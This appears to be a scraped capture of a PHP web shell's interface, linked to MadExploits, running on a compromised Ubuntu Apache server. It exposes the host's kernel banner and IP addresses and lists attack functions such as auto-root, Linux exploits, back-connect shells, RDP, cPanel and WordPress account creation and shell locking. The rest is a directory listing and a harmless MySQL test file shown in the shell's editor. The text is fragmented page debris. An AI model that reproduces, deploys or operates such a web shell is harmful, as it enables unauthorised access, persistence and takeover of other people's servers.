Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.219.58.157
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
mysql /
mysql-test /
suite /
ndb_ddl /
[ HOME SHELL ]
Name
Size
Permission
Action
alter_rename.inc
4.59
KB
-rw-r--r--
alter_rename_copying.result
414
B
-rw-r--r--
alter_rename_copying.test
277
B
-rw-r--r--
alter_rename_inplace_force.res...
188
B
-rw-r--r--
alter_rename_inplace_force.tes...
698
B
-rw-r--r--
alter_rename_inplace_implicit....
192
B
-rw-r--r--
alter_rename_inplace_implicit....
567
B
-rw-r--r--
alter_rename_simple.result
302
B
-rw-r--r--
alter_rename_simple.test
301
B
-rw-r--r--
cleanup.inc
219
B
-rw-r--r--
list_objects.inc
1.61
KB
-rw-r--r--
my.cnf
554
B
-rw-r--r--
rename_single.result
331
B
-rw-r--r--
rename_single.test
456
B
-rw-r--r--
setup.inc
2.88
KB
-rw-r--r--
verify_mysql_dd.inc
850
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : alter_rename_inplace_force.test
--source setup.inc # Test ALTER TABLE with force of inplace rename # - will try to perform the rename using inplace API # - NOTE! caveat is that inplace API will only be used if there are # other changes to the table - else "simple rename" will be used # thus the test will add a column and rename table at same time # # Query will fail since ndbcluster returns HA_ALTER_INPLACE_NOT_SUPPORTED # when mysqld asks if it supports inplace ALTER RENAME. Since user requested # inplace, the query will be rejected by mysqld. --error ER_ALTER_OPERATION_NOT_SUPPORTED ALTER TABLE t1 algorithm=inplace, ADD COLUMN c INT, RENAME TO t1_renamed; --source verify_mysql_dd.inc --source cleanup.inc
Close